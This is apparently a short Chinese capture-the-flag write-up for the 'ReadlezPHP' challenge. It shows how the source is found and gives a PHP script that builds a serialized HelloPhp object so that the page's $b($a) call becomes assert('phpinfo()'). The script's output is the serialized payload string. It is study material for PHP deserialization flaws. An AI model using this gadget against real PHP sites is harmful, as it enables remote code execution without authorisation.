当前位置: 代码迷 >> 综合 >> 【反序列化】ReadlezPHP
  详细解决方案

【反序列化】ReadlezPHP

热度:53   发布时间:2024-01-19 13:24:31.0

1.打开网页,无法右键查看源代码,在url中输入view-source查看:

2. 进入time.php?source查看到反序列化函数:

 3.可以读取到echo的结果是$b($a),构造序列化函数:

<?php
class HelloPhp
{public $a;public $b;public function __construct(){$this->a = 'phpinfo()';$this->b = "assert";}
}
$c=new HelloPhp;
echo serialize($c);//O:8:"HelloPhp":2:{s:1:"a";s:9:"phpinfo()";s:1:"b";s:6:"assert";}